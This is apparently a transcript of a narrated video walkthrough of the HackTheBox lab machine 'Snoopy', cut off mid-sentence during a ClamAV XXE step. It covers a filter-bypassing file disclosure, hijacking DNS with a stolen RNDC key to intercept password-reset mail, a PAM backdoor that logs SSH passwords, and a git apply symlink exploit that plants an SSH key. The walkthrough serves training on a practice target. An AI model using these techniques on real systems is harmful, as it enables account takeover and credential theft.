What's going on YouTube? This is Ipsec. I'm doing Snoopy from HackTheBox, which involves a lot of snooping in on conversations. But before you can do any intercepting, you have to discover some type of secret key, and in this box, it is the RNDC key. That is the remote name daemon control key. It allows you for updating the DNS records, and you get it by exploiting a file disclosure vulnerability on a web server. So with that, you can update the mail servers to point back to yourself. So then when you go back to the website, do a forgot password, it emails the password reset link to you, and you can take over the user's account and log into Mattermost. Once on Mattermost, you discover there is a bot that does some type of server provisioning. It actually SSHs into the server, so you can have it SSH into you, and they can steal the key. There's a lot of ways you can steal the key. You can do a SSH honeypot, but we'll put a PAM backdoor in because that's just really fun. Get the key, you SSH on the box, and then the root step is exploiting a get and clamav CVE. With that being said, though, let's just jump in. As always, we can begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Snoopy, then the IP address of 10.10.11.212. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have DNS on port 53. It is running the bind server, which is the most common DNS server on Linux, and it's also telling us it is Ubuntu. We also have HTTP on port 80. It's running Nginx, also, surprise, it's on Ubuntu, and the title tells us it's SnoopySec Bootstrap template. Bootstrap is just like a theme for any type of website. And if you wanted to go further in depth, you could Google all these banners or go to launchpad.net and you'd see all this Nginx 1.18.0, SSH 89p13 Ubuntu 01. And this is all obviously on Ubuntu Jammy, which is Ubuntu 22. So I don't think there's any containerization or virtualization in play, but I could be wrong. That's just basic recon. So let's go take a look at the website. So we're doing 10.10.11.212, and we get to the page that says Snoopy Bootstrap template. And then there's 2 links here. We have /download and download file attachment.pdf. So let's just send this over to Burp Suite so we have the request, but I don't want to take a look at it just yet. I just want to put them in repeater. So as a reminder, I need to look at them. There we go. Because if I went and started going down that rabbit hole right away, there's a likelihood that that may not be vulnerable and I may be missing something else. So I always like starting all of my recon first. Going down the page, they do penetration test services. We have an email snoopy.htb. If we go over to about, it's talking about SnoopySec. Again, I'm kind of looking for names. We have more names and emails, so if we come to a login prompt, we have things to try. It looks like it's all snoopy.htb. I'm going to go ahead and just add that to my host file since we've seen that referenced quite a bit. So let's do 10.10.11.212 snoopy.htb. If we go to services, these are the links that we downloaded before. Nothing too interesting. Team, I think this is the contact form. I thought I clicked on team. Okay, that's what we saw before. And then on contact, we do have a banner that says, as we migrate DNS records to a new domain, please be advised that a mail server mail.snoopy.htb is currently offline. So let's also add that to our host file. And we can go to mail snoopy HTB. Let's make sure we go there. And it just goes back to the main website. Let's do an NS lookup. Let's set the server to 10.10.11.212 because they did have bind running, right? So we could do snoopy.htb, communication timed out. I think it's only using TCP, which is a bit odd for a DNS server, honestly. Most DNS servers operate on UDP. In Linux, when you see TCP, it generally means zone transfers are enabled, I think. because zone transfers do require TCP. You can't do a zone transfer over UDP. So I'll do dig, I think it's AXFR, then the, that, is that how the syntax? I think it's at IP address and then the domain. There we go. So now we have a list of all the name servers. So, or not name servers, but DNS names. Mattermost, NS1, NS2, Postgres, and Provisions. So let's add all these to our host file. So sudo vi etc host. And also interesting enough, we do have some 172.18 networks. So this could actually be Docker. So let's add Mattermost. I mistyped etc host. So Mattermost, then the next one was which could also be another Mattermost domain. I'm not going to bother with NS1, NS2, but maybe Postgres.snoopy.htb and provisions.snoopy.htb. So let's take a look at all those. So curl Postgres Snoopy HTB. I think this is the same exact thing as the website. I wonder if I MD5 some this. And then let's just do Snoopy HTB. That is the same MD5 sum. We can hide the bandwidth -q-s. So what was the last domain? Provisions. And that is a different MD5 sum. So let's go take a look at it. So copy this, go to provisions.snoopy.htb. I really need to disable that in my Firefox. Let's disable Burp Suite. Why is that having trouble? Copy. Did I typo this? That would be an issue why MD5 sum didn't work. Could not resolve host. So yeah, I must have typoed something. Okay, that is the same exact thing. Helps to copy and paste. Now the question is, which one did I typo? I typoed that one. Okay, that is the one we had saw before, I think. So nothing too interesting here. So we got a bunch of domains. They're all the same site, so nothing we can do there. Actually, we didn't test Mattermost. We go this. Let's see. I have a trailing period. That actually breaks it on the host file. I did not realize that. There we go. So this does go over to a Mattermost instance. Let's do view in browser. We have a login prompt, and we have email and username. So we can do the forgot password, and if we go back to the team, we can try resetting a password. So cschultz@snoopy.htb, and it failed to send the password. So I don't think there's anything more we can do with this. Let's just go back to the main website because this is where most of the custom code is. I don't want to pen test Mattermost because that's just a open source application. Chances are there's not vulnerabilities in there for me to find. So if we look at this, it is going to contact.html. I want to verify this is a static website. They did have some dynamic content. If you remember, there was a /download. That /download was on the about page. So let's go and intercept this in Burp Suite. and see exactly how this works. So if we, did that not intercept? Is Burp Suite itself? Intercept is off. Okay. Now we have this request. I guess we already had it, but if we make a request to index.html, we get a page. If we make a request to download, we get something. It's taking its sweet time thinking about what it wants to give us, but it is going to be a zip most likely because I see this PK. Whenever I see PK, I know that's like the magic bytes for a zip. We got announcement.pdf I see, and at the very bottom, I think it does have some more strings. So like snoopysecmarketing.mp4. So that's a video. But I want to see exactly what type of script this is. So if we make a request to does not exist, we get a 404 not found. If we do does not exist.html, still a 404 not found. If we do .php, we get file not found. This is still a 404, but it's a different message. And the whole reason this is happening is just because of how Nginx works with PHP. There's most likely some type of redirector looking for anything that ends in .php and then sending it to the PHP server itself. Maybe that's a fast CGI instance, or maybe the FPM manager for PHP. I forget what FPM stands for. PHP FPM. Go to Google. We are intercepting something pool manager. Oh, fast CGI process manager is FPM. Essentially, Nginx does not process PHP natively like Apache can. Apache has a module, so it just has its own PHP interpreter within that module. Nginx uses rewrite rules to say, oh, this is a PHP file. Let me send it over to this application. So because of that, that is why the error messages are slightly different. Not every Nginx server is going to do this. If it's not configured with PHP, then this would be the normal error message. But now we do know that PHP exists on the server. If I do download.php, chances are it's going to be the same as /download. So long way to say, that's why when I do this next gobuster, I do -x for PHP because I want to brute force PHP files. -u HTTP 10.10.11.2.12 word list opt sec list discovery web content raf small words .text. We can do out gobuster.out, and now we have a gobuster running. So while we do that, let's go back to the first two things. We just have a download request and then download with file. I always like renaming my tabs because it does come in handy. So if we do file announcement.pdf, we get looks like a zip, file name press release.zip. If I do a bunch of, let's see, .. like this, Etsy passwd, we get nothing. If I just did /Etsy passwd, I get nothing. The other thing I would try is like a PHP filter. So like PHP filter convert .base64-encode resource is equal to this, and we get nothing. So we're not at the start of something. Or I don't think I'm at the start of something. By that, I mean, it's probably like a file get contents and then uploads, and then I'm appending the file name, right? If I was at the start, and this would only be on include, I think, for the PHP wrapper. I could be wrong there. But I know I'm not at the start of something. So if I do .. announcement.pdf, I do get a zip, which is a bit odd. So I know it's probably just deleting .. Or maybe it's doing a string look for announcement.pdf. If I do .. announcement.pdf, we get something. If we do 3 dots, we get nothing. So what I'm thinking is happening here is it's removing these .. So what I'm going to do is a .. and then inside of that .. I'm going to do another one. And then we're going to send this a bunch of times and do etc passwd. And we get a zip. So what just happened here is it's removing the field ... So it's got like this bad character lookup field. And it's just removing ... because that's a bad character, but it's not doing it recursively, which means it only removes it once. So let's see if I can show this real quick. It should be only a second. It's probably going to be a pain, actually, because of all the special characters. But it just removed that and left ... and it didn't try it again. So that's how that LFI works. Now this, I got really lucky that I noticed that behavior. That's not something I would always notice. That being said, I normally catch these by fuzzing, just like we like running gobuster in the background. I'm going to just kill this off because I don't think there's anything useful and it would slow down the next thing. I also like using FFUF, right, to fuzz. So we'll do FFUF-U HTTP 10.10.11.2.12, then download !, file is equal to fuzz. And then we can do -W for word list. And if I go in opt word list or opt sec list, let's see, there's an LFI one. Let's just do grep-i LFI. There's a fuzzing. Then there's a fuzzing LFI JHaddix. Guessing that's Jason Haddix's fuzzing thing. Then we have paths. So I'm just going to go into the fuzzing directory, LFI. And if we look at this, there's a bunch of weird things like that LIV thing. I think that's base64. There's the ... I want to say there's probably other ones like this. So here's this also looking for it. So if you remove ... you're left with one. So let's use this word list. This looks like a good one. Famous bug bounty hunter. So obviously probably has a lot of good word list. So let's do opt sec list fuzzing LFI. And I'm kind of upset they call this LFI. This is really file disclosure. It's not local file inclusion unless you get command execution by technicality sake, but most people mix up the two. So let's do LFI, then JHaddix, go, and we want to filter something. So let's filter size 0. And it looks ugly because these are huge file names, right? But we can see we are hitting on this and we can see the size. So whenever you suspect there's like a file disclosure vulnerability, maybe you're downloading a file, I would also try LFI word list just because it tests 922 things and all of a second, right? So fuzzing is powerful. So we know there is an LFI here. We want to see if this is actually the etc passwd. So let's copy to file, and I'm going to call this passwd.zip. And I probably copied the whole request, so I'm just going to delete the HTTP header. And we are left with a zip file. I'm going to make a directory temp, unzip this file into temp. And we see there's a press package, and then our file name, etc and passwd. And we have all the users on the server. We do see there is a bind user. We also have vgray, C Schultz, a bunch of the actual accounts. If I just grep for everything that ends in sh, that's an easier way to see the interactive users, right? So with this file disclosure technique, we could keep just brute forcing a bunch of files and find things that are interesting to us, but that's a very time-consuming process just because we have a few steps of getting the file, downloading it, unzipping it, checking the results. Whenever there's multiple steps involved, I always like going over and taking the 2 to 3 minutes it would take to automate it in Python, because once it's automated, you can do it quickly. You'll probably try more files out and you may find something interesting, right? If it's a tedious process, chances are you're going to try to get off that process as soon as possible. But if it's not tedious, you'll spend more time on it and find more things. So I'm going to just call this download.py and open Visual Studio Code. So the first thing we want to do is import the request module because we want to make a HTTP request. So let's do a download. And I'm actually going to change it from URL to just file. And then we can say URL is equal to f:/http 10.10.11.212/download .. file is equal to, and we want to put our ... slashes. And we can say file. Okay. And then we can make a request to the URL. And we can say if length of content is 0, return none. So if there's no body to the request, we had an invalid file. Then the next step would be to process the file. And I'm going to use a library called IO. So we can do import IO. And what this is going to do is map the string to a file in memory. So we're not really touching disk. If we didn't use IO, we'd have to write the file to disk. Then we could use zip file to process it. But this way just does it all in one step. So I'm going to do zip content is equal to IO bytes r.content. So now this is really a file. I wonder if I hover over it, not accessed, zip content bytes IO. It's not easy to see, but that was why I used io.bytes. So now we can do with zip, let's see, as z. Okay. So we don't want to extract everything. And first we have to import zip file. If you're curious what this whole autocomplete thing is, that is GitHub Copilot. It is just like ChatGPT integrated into Visual Studio Code. So I can say the content is equal to z.read and file. And one of the things that we have to keep in mind is the zip. If we went into temp, it put everything in the press package file. So if we do find.-type f, the press package is before the file name. So we're going to do f and then press package as an underscore. There is like this /file. Okay. And then return content. So now we can just do download. And I'm going to try etc passwd. And let's print this out and see what happens. So I'm just going to press F5, run it as a Python script. Terminal is running. And there is no item like that in the package. So I can hop over to the debug tab. And this is why I want to do it in a Visual Studio Code instead of just a Python file. Because I can do z. Let's see. Is it file list? Or maybe I can just go over here. Does this have everything? Comment. There we go. File list 0. And this is all the variables. So file name, I can probably copy that value. And it's press package. And then we have a double slash. Oh, and I didn't put, that's probably my mistake. But it is nice to go into a debugger immediately. So let's try this. We have it. It is encoded. So let's just do .decode, print, run. There we go. Awesome. So we can return .decode. And let's see. I can say file is equal to download, and I'm going to make this an argument. So sysargv1, so the very first argument. And now we have to import sys. And then we can say if file print file. And the reason why I put this if here is if it returns none, then file is going to be false, and I don't want it to do anything. So now we should be able to just do let's go back up one and hold on. I forgot the user bin m python 3 chmod +x download. So if we just do download.py etc passwd, now we have a way to download files quickly. So one thing I do is for I in sec 0, let's do the first 100 PIDs. We can do download.py on proc I cmd line. Done. So right now I'm just trying to dump a list of processes on the box. Maybe we won't get any. It depends how the box is configured, but sometimes you can get a lot of good information out of this. But unfortunately, in our case, there's nothing valuable there. We could try getting the actual site source code. So I'm going to do /proc cwd or proc self to get into our own PID. And I can do cwd and index.html, and we get the HTML page. So let's do index.php. Actually, it was download.php. And we can get the source code to this. So I'm just going to cat it to download.php. And then we can just look at it in Visual Studio Code. So we have syntax highlighting. I think. Close that. There we go. So we see file is getting set here. And if we look at it, file exist, file content, where is it setting file? Is set, scan directory. Let's see. Directory. So if we exist and it doesn't contain dot and dot dot, that's going to do this replace. And this is where I was saying it wasn't recursive. And then we do zip add file, zip close. So I don't really see any vulnerabilities in here or any like passwords or anything. There's not really that much interesting. So let's go try to get other things. Another common thing to do would be like look at the Nginx config. So we could do like etc Nginx sites -enabled. And I think default is the first parameter, or the default one. We got a lot of comments. So I'm going to do a grep-v on anything that starts with a comment. Or anything that, I guess, has a comment. And then we do a grep period to only grab lines that have data. And we can see it. So this is why the error message was different. And where I was talking about going to a FP, like the fast CGI process manager, right? We can see Nginx, if anything ends in .php, then we include the fast CGI parameters and send it to this pipe or this socket, right? So that's how Nginx executes PHP files. Again, in Apache, they have a library, so the actual Apache process is doing the execution, but in this, it's slightly different. So long way to say, there's really not that much interesting here. We can see download was alias to download.php and also has that. So this is why the download script did not need the PHP extension. We also had DNS listening. Remember, we did the zone transfer. And also, if we went here and went to the contact form, they did have this message about migrating DNS records. So I'm going to take a look at the DNS config. So if we go to etc bind named.conf, we can see we have a RNDC key. I forget exactly what this stands for, but this is the like secret key DNS uses for signing. And that's like to talk between DNS servers. So let's include the named conf options. We see DNSSEC is disabled, and then allow transfer is enabled for the whole 10 subnet. So this is why we could do the zone transfer right here. If we look at the next file, the .conf.local, we can see the configuration for the snoopy.htb zone. This is the one we did the zone transfer on. Here's the database for it. We could dump this. So if we dump it, we get exactly what we saw with the zone transfer. But the next thing is really interesting. We have allow update key RNDC-key and then allow transfer. What this means is anyone that has the magic key is able to perform DNS updates. And you may think, why would this happen? Well, in most like domain networks, the Windows DHCP server is not the same computer that is the DC that holds DNS. So in a Windows network, the DHCP server generally has this key, and whenever it assigns a client a host name, it goes to the DNS, does an update to add that new DHCP client to the DNS zone for workstations, so DNS is working in the environment, right? This is a very like common thing. So what I'm thinking now is we can create our own entry for mail.snoopy.htb on this DNS server with this RNDC key. And when we do that, we point it to ourselves, run an SMTP server, and now we're intercepting mail that goes to that domain. So to do that, it uses a binary called NSUPDATE, or the common way to do it on Linux is use NSUPDATE. It's a dynamic DNS update utility. We specify the key file, or we could just do key name and secret in an argument, but key file is generally easier. And then the file name containing what we want to do, right? Here's like an example. This is adding an A record. This is like how the TTL for the domain, I think. This is adding a C name record, but we definitely want a name record. So let us go and create. I'm just going to make a direct. Actually, the first thing we want to do is grab this RNDC key again. Okay. I'm going to make a directory DNS, and I'm going to call this RNDC-key. Paste that in so we have it. And then I'm going to call it update.txt. And we need to specify the server, so 10.10.11.2.12, the zone, which was snoopy.htb, and then the record. So we're going to do update add mail.snoopy.htb. Then whatever TTL we want, the default is always 86.400, but it really doesn't matter. I'm just going to do 600. In a 10.10.14.8 is my IP address, and then send. Okay. So now we can do NSUPDATE-K and then the file name, or dash NSUPDATE-K RNDC-key update.txt. And before I do that, I want to do a dig. So let's just get into this directory so it's even. Dig at 10.10.11 to 12. I'm just gonna make a request for snoopy.htb first. I want to add some options. Is it plus quiet? Let's see. Dig quiet. Is that going to be one? Plus short is what I want, because I don't want all this whole entries. So if we just do plus short, that did not work. Do the plus options go here? Let's see, dig. No all answer. Snoopy HTB. Okay, that's a good one to do. So if we did mail.snoopy, we get no response because this doesn't exist yet, right? If we did snoopy.htb, this one does. So let's update. And now when we do mail, we have it. SMTP uses port 25, I believe, by default. So if we just listen on this, and then let's go back to Mattermost, reset password, and let's see, we got to go to team. Let's just reset the CEO's password. Reset domain. It failed to send. So I think there's probably some process that reverts the DNS. We get a connect. So now we have to run a SMTP server because it's waiting for the server to respond with maybe like a hello or something before it does anything. The easiest way to do this is just using Python, as it has a module just like the HTTP server. So we do python-m smtpd -n-c, and we want debugging server. If we don't do this, I don't think it outputs all the information. And then we'll listen on all interfaces, port 25. And since it's a privilege port, I have to run this with sudo. So I run this, and it doesn't give me any output. I think that means it is running. Let's just do NSUPDATE, and then reset the password again. And we have HTML, so that is a good sign. So if we look at this message, let's see. We probably should have wrote this to a text file. This is crazy. I'm just going to search for HTTP. So we have the link here, reset password mm.snoopy.htb complete, and that gives the token. So let's do this. Token is equal to copy, and that goes on 2 lines. Is that it? That's weird that it has an equal. 3D. Is that HTML encoded? What if we do this? Enter a new password. Awesome. So I'm going to do a password of password and see if it accepts it. It may require some complexity. Password 1 exclamation point. Change it. Or invalid or missing token request in the body. So I probably screwed that up. So it looks like every line ends in equals. I should have noticed that. Equals like this. Copy, paste. There we go. This is looking better. So go here. Enter the password. Password 1 exclamation point. Invalid or missing token in request body. What are we forgetting? So we go here, we send it. So I guess it is invalid. I did hit it a few times. So let's just redo this and go straight from the top. Reset password. C. Schultz. We need to do this update again. Reset. There we go. Search for HTTP. And let's grab this. So copy, paste, reset password, paste, and paste. And it's still saying invalid or missing token. And the odd thing that sticks out to me is this capital 3D. I want to say in HTML encoding that is an equal. And we see it here as well. After like every single equal sign, it has 3D, right? So let's just try removing that because we have this equal sign right here and then 3D equal sign. So yeah, I think the 3D is bad. It's probably some weird SMTP encoding thing. So let's set the password. And there we go. That was it. So let's log in. It was C. Schultz, right? We have the CEO right here. And then P at SSWOD 1 exclamation point. And we get logged into Mattermost. So let's zoom in so everyone can read the chat. And it looks like there are two channels. So let's just look at it. Created a new channel dedicated to submitting requests to a new server provisioning. Dedicated channel. So let's go into off topic. Is that where the channel is? Or maybe we can, let's see, how do we add channels? Find channel. I'm going to say provision. There we go. I have joined it. If you need assistance from an online staff member, request, let's do /server provision. And let's see, submit a new request. So we'll be with you shortly. So I'm going to do C Schultz at, let's just paste the email. Department, we'll say HR. Let's do Linux. And it looks like it reaches out to us maybe on port 2222. Let's say 10.10.14.8. So what I'm going to do is do nc lvnp and then 4 twos. Click on submit, and let's see if we get any request. We do. So it's reaching back to us, SSH 2.0 Paramiko. So this is a Python library that's making a request to us. Now, we're not responding SSH, so it's not doing anything. I want to see exactly how it's logging into us. Maybe it's going to be a key-based authentication or password-based authentication. If it's password-based authentication, we can obviously sniff the password out. We can't do it with just like Wireshark because SSH is encrypted. We can stand up like a honeypot with Cowrie or Kippo or just create our own SSH server, but that's not that fun. What I want to do is I'm going to create a backdoor PAM module that is going to, or I'm going to configure PAM, the pluggable authentication module, to log all the passwords to SSH and then just direct them at my box. And this is something I've done on just a lot of engagements when I compromise a Linux server and I want passwords and I can't really crack them out of shadow. I'll just modify PAM, log passwords users type, and get them that way, right? So this is why I'm showing you this way, because I find it a lot more value than just standing up a honeypot. If you're doing defensive things and you want someone to log into you and capture the password, of course, honeypots are great. But if you're on like an up and you want to log passwords out of SSH, I've had a lot of success with this method. So the main thing we need to do is make sure our PAM exec.so module is installed. It's going to be by default on most things. So if we just do find slash like this to dev null, we probably will have this module. Or you can normally just assume you do. We may have to be root. Okay, we do. So pamexec.so does exist. So let's do sudo vi etc pam.d, and here is all the modules we could log. We could go with SSH, right? And SSH is going to hook common account first. So we could either put it here or just go straight to common account or common auth up here. I'm going to do those so we actually log like su, sudo, and all those other fun things. So let's do common auth. This looks fine. And what we're going to want to do is append a line here. And we're going to say auth because we want this as part of the authentication module. We're going to say optional. And what this means is if it fails, it doesn't impact anything. This is just an optional thing. You can do like required or requisite, like required. If this fails, then the login process would not work, which we definitely don't want to impact. And then we want to specify pamexec.so. This is the PAM module that will execute actual files. And then we're going to do quiet, which is going to suppress any output that is generated to the user. If we didn't have this and the script failed, it may output something to standard out or something like that. And we definitely don't want that. Then we want to give it the flag expose auth token. And this is going to expose the authentication token, which is the password. And then we can specify the script that we want it to execute. I'm just going to put it in dev shm, and I'm going to call it pwn.sh. So we're going to save this, and then I'm going to go in dev shm, pwn.sh, and then we'll call bin sh. And this is going to be the script. All we're going to do is echo. I'm going to say the date, and then I want to give it the PAM user, and this is an environment-based environment variable, or a variable from the PAM exec module. If you went to pamexec.so, it would have all these things, I believe. Let's see. We said PAM user. So here are the things. We have like PAM rhost is going to be IP address, remote user service, TTY, PAM user, and type. So those are all the variables we can expose. So I'm going to do PAM user : and then we're going to grab everything on standard out, and we're going to execute it to dev shm pwned.log. We're going to make the script executable. And now let's just sudo restart sh or sudo sshd restart. Service. I actually think I have to install the OpenSSH server. Is that it? Okay, it is installed. Let's see. Sudo. Are we listening on port 22? We are not. Maybe it's just SSH. There we go. So now, if I go in dev shm, we have the script here. I'm going to SSH localhost, and we're going to put please subscribe, and it's going to fail this login. And we did not create that script. I expected to. The actual password of this machine is password. We log in, and we got pwn.log. So right now, all we're doing is logging valid passwords. And we definitely want to log invalid passwords, right? So we screwed something up. Etc. We did it in this pane. Let's see. I bet I want to put it above here. I think right here, success is equal to 1. This is meaning, I think if login is successful, then it goes and does other things potentially. Let's just put it at the top and see what happens. Sudo service sh restart. Please subscribe. Wait for it to fail. There we go. So now we're logging invalid passwords as well. Let's make sure users also don't have to be valid. Okay. So an invalid user, I'm not logging the password. Right? I just did password there. So we may have to do this request twice and get it, because I forget exactly how to change it so it also triggers on invalid users. What's happening here is PAM first is looking up the user. It doesn't exist, so it never bothers reading the password. So that's why we don't have it. I guess the other thing we'll have to do is have SSH listen on port 2222, because that's what the provisioning script used. So let's just tail-f that, and I'm going to use socat, and we're going to say TCP listen on 2222, fork, reuse address, and we're going to forward it over to 127.0.0.1 port 22. So this is just a quick way so I don't have to modify my SSH config. I like doing this because I always forget changing things back, and I don't want my SSH permanently listening on this. So this is a good temporary solution. If I reboot my box, SSH will no longer be on that port, right? So let's go back to Mattermost, do server provision, username. I don't think the username actually matters. Department, let's just do HR, Linux, 10.10.14.8, submit. And we got CBROWN. So let's just do a sudo user add CBROWN. And redo this command. I guess if you're using a honeypot, then the user thing you don't even have to worry about. But oh well. this was still fun to show. CBROWN, and we get the password, snooped credential. So let's do SSH, CBROWN at 10, 10, 11 to 12. Yes, put in this password. And we get logged into the system. So first off, let's go back into a PAM. Always, always, always remove your backdoor. I can't tell you how many times I placed a backdoor on my machine and completely forgot about it. Always embarrassing. So now that we're CBROWN, we can check our home directory for anything interesting. So I'll just do find.-type f, and we don't see anything. We can also check sudo. And if we look, we have the ability to use user bin git apply and then specify just ASCII, I guess. Can't really do special characters there. So I want to see if there's anything we can do with git apply, and that's not to root, that's to the user sbrown. So my first step is git apply exploit, and let's just see what there is. Git security vulnerabilities, directory traversal, git privilege escalation. So there's a lot of details around this. This looks like a lot of various ones. Here's it talking about git apply specifically of creating a patch. If we look at this, upgrade git to, let's see what version we're on. So I think it's git -- version 234. So that's 230, 31, 234. 234.7 is patched, and we're on 234.1. So we are vulnerable to this directory traversal CVE. And I don't think this is explaining it that well. Let's go to this page. So here's 2. This is when cloning a repository. We have the apply. Git allows for applying patches with git apply. In order to prevent malicious patches from creating outside files, git apply rejects when a write is beyond a symbolic link. However, mechanism can be tricked when the malicious patch itself creates that symbolic link in the first place. So if the patch creates a symbolic link, then Git itself isn't treating it as a symbolic link, and we can potentially exploit it. I did a lot more reading on this vulnerability before actually exploiting it, but let's just run through it real quick. So it's going to seem easy. It's really not that easy. So we'll just call this git exploit, I guess. And let's do git init to initialize it. Let's see. We probably should set the default branch. That's probably going to be master, right? Just so it stops yelling at us in the future. So let's create a symbolic link. So I'll do ln, and the user was sbrown. So we'll do home sbrown.ssh, and the symbolic link, I'll just call it symbolic. We need -s like that. So now we have a symbolic link that goes there, but the CBROWN user can't go into the sbrown user. And again, the reason why I'm saying sbrown is that's the user we can run it as. And we want to write our SSH key to him. So we're going to do git add to add the files in this. And then we just git commit, initial commit. Okay, let's just add this stuff. So let's see, we are CBROWN, and let's do CBROWN at snoopy.htb, and I typoed, there we go. So now we have our initial commit. Did I actually commit that? I did. Git log. Okay. So let's rename this. So I'm going to move symbolic link to symbolic link. We'll do rename symbolic. And then I'm going to just create data real quick, echo data to IPsec. And then let's git add dot git commit -m changed symlink git push. Oh, we don't even have to. We're not pushing to a repository. That's just habit after I commit. So what we did that for is now we can do a git, I think it's format-diff, and then the 2 commit IDs. So let's do format diff 5F369, which is the first one, and 2F7B. Let's see. Man git help. Is there format log show diff work tree? Will git diff do it? I don't think it will. It kind of does. But I want to output that to a file and create a patch. Maybe this works. Let's try it. So let's v patch and add this. So what we want to do is down here after this rename symbolic link, we're going to add a file. And this is why I created the file ipsec. So we can see the syntax for adding a file. So we want to do b/renamed symbolic /authorized keys. And then we can do @ like this. I think that's just saying at position 0, the first line is what I think that means. And then we do plus and the data we want. So let's do sh-keygen-f, and I'll call it CBROWN. Cat cbrown.pub. And we have this whole string. Okay. So what this patch is going to do is hopefully change this symbolic link and then add this SSH. So let's do sudo-u sbrown user bin get, because I think that's how the sudo-l thing said. And we can do apply-v patch. PATCH. Inconsistent new file name on line 9. Let's see. Let's do git checkout. Git. I'm going to cat patch because I don't want to lose this. And then git checkout 5F369. I wasn't sure if that error was because symbolic was already renamed and like the file existed. So I went back to the initial commit. We're going to apply our modified patch. Inconsistent new file name line 9. Actually, I just realized what's happening. Each of these is a whole metadata set or something of what's happening. Like this is doing a get difference. We got new file mode. I don't know what 100 is. I'm guessing 644 is the permissions of that file. Then we have the index. This is probably saying the file did not exist before. Then we create the new file and then do date. And this is just the same thing, but renaming a symbolic link. And we just put stuff down here. We didn't do the header for a file. So let's actually add the header. So I'm going to highlight this, yank. Then we can put it down here. And we can say authorized keys, then new file mode. And there we go. I wonder if this is going to work. I wonder if we need like a separator between these. And I wonder what index means. Can't open file for writing. That's not a good thing. Dev shm patch. Guessing that means a cleanup script went ahead and deleted a directory. So that's why I saved it out. Let's do make dir get exploit, go back in here, get init, create that symbolic link. Then we need to add the files, initial commit. Then the next thing we do is move a patch here. And let's just try applying this. Inconsistent new file name on line 13. New file mode. So this is a more promising error. I wonder if we need index. And let's just make sure it did not work. chmod 600 CBROWN 10, 10, 11, 212. Okay, did not work. Let's look at the patch again. We can probably remove this whole IPsec piece because we don't need it. I am going to take the index though. Oh, we probably need renamed symbolic. Unable to unlink. So let's do chmod 777. So what I think happened here is sbrown did not have permission to unlink anything because CBROWN created it. So I should have done, let's just go here and chmod 777 symbolic. Let's try applying it. Now that everything's 777, that looks better. We applied the patch cleanly. So I think that was the issue. If I look in this directory, we have renamed symbolic. We don't have the SSH key, but I bet if we SSH, it's just going to magically work. And it did not. Let's see. We can't get into that directory. Something weird happened. I don't know exactly what it is. Authorized keys. Where is the symbolic link made? Home sbrown SSH. That looks good. I wonder if it's permissions. So I guess the easiest way to troubleshoot this is going to be it's going to cp patch to ... or let's cat standard out in case it gets deleted. Let's get checkout 5357. MV renamed. Let's just do symbolic. Actually, we want to remove the symbolic link. And we're going to create a symbolic link to /temp. Do temp exploit. Like that. And then chmod 777 to this directory. So now we'll be able to actually see if it creates the file and what the permissions are. So let's apply the patch. Let's see, checking patch, symbolic, no such directory. Error, symbolic. That is weird. I wonder if we should just re-step through this. Make dir get exploit 2. ln, let's do that again. And then get init, get commit -m initial. We called it exploit. Shoot. Oh well. That'll be fine. Let's cp get exploit patch here. And let's see, we can say symbolic is now called exploit. There's got to be an easier way to do this. So we add the authorized key file. Okay. We apply the patch. It looks like it applied successfully. So if we go in temp exploit, there is a authorized key file, and it is owned by sbrown. And if we look at the contents, it is our SSH key. So if we stat that file as well, that is 644. So I'm going to change it to 600. So let's go back and get -exploit. Did I actually call it exploit the second time, and that's why I was complaining about a bad file name? I think I did. ln-s symbolic, and then we'll call it home sbrown ssh. Reversed order. There we go. Let's just recreate the Git directory. Okay. So now I think we are good. Symbolic is created. We're going to rename it. We're going to place it in authorized _keys. And we want to make this mode 600. Apply. Says it renamed successfully. It's still asking me for a password. And I just realized I'm an idiot. The user's sbrown. I don't know why I kept thinking CBROWN. Maybe because the name is so similar. It probably would have worked probably 10, 15 minutes ago whenever I first did it. But hopefully you learned a little bit from just troubleshooting that and how I'd go about it. But it's probably just me mistaking CBROWN and sbrown. Easy mistake. But you can also see that didn't change the permissions. I don't know if that's because this file existed before. If we look at the date, 58, that was 2 minutes ago. So I'm guessing it did create the file, or maybe it just modified the file. But maybe that isn't permissions. We'd have to do a bit more troubleshooting, but I'll leave that to be you because we've taken enough time on this step. If we look at sudo-l, we can see the user, sbrown, can run clamscan with the debug flag. and he can only scan files in home sbrown scan files. So the very first thing I would do is attempt to use a symlink and scan root.txt, right? So if we go here, we do ln-s root.txt, and then just say file. We have a file that is pointed there. So let's see exactly what happens if we do sudo with this. We'll probably have to get rid of that one caret. So sudo this, get rid of that, and then scan file. We see it's dumping quite a bit of information. And let's see if it eventually hits the file and outputs the content. So far, I'm not seeing anything. We may want to do it with a file we actually know, because then we can just grep the output and find it that way. So I'm actually going to Control-C this, and we're going to take a step back, and we're just going to do ln-s etc passwd on file. And then I'm going to do script. So now all the output's going to be logged to a file called TypeScript, so I can just grep it after I'm done. Because when you use sudo with pipes, weird things happen. So let's go back up, grab this. And we're just going to let the scan finish and see if we have anything from etc passwd. Now that the scan is finished, let's exit the script. Let's cat etc passwd and grab a unique string that probably doesn't exist in it. I'm just going to do this because it's near the top, and I can do grep this against TypeScript, and nothing comes up. We could do -ai to force script to go in, but it doesn't look like it's outputting strings of what it scans. So we won't be able to get root.txt this way. Now I'm going to go over and let's look for CVEs and clamav itself, right? So maybe there's something we're supposed to exploit with this debug flag. So let's search CVE list, type clamav, submit, and let's see. This is an automit module. I'm going to guess this isn't the case. Then we have this one, a image parser and HFS. I did a lot of Googling here. I couldn't find any proof of concept, and creating HFS file systems sounds like it's probably going to be out of scope or too difficult, right? So let's keep going down, and we see a vulnerability in the DMG file parser, and it says XML entity substitution. So this is just simple XXE injection in DMG files. This sounds very doable. The first step we have to do is get a DMG file. And I'm just going to go Sublime DMG because I know off the top of my head, Sublime does have a Mac application. So we can download it. There's probably better ones to use because this is going to be a bigger file, which means it's going to take a little longer to scan. But that is life, right? So let's go create a new window. Move downloads Sublime, and then we can do a strings against it to see if XML is visible, and we do see it. We have a bunch of XML here, and it starts up here. So what we're going to want to do is modify this doc type, and we're going to put our entity injection there, and then go to the plist key and try to exfil data. We can probably do it with multiple keys, but we'll do it with plist because I know that one works. So if we do gex and then Sublime, we open this. I'm going to press Control F to do find, hit tab so I go over to this side, and then I can search for doc type because this is going to be the start of the string, and we're here. So I want to replace this piece with the XXE. So let's go and go 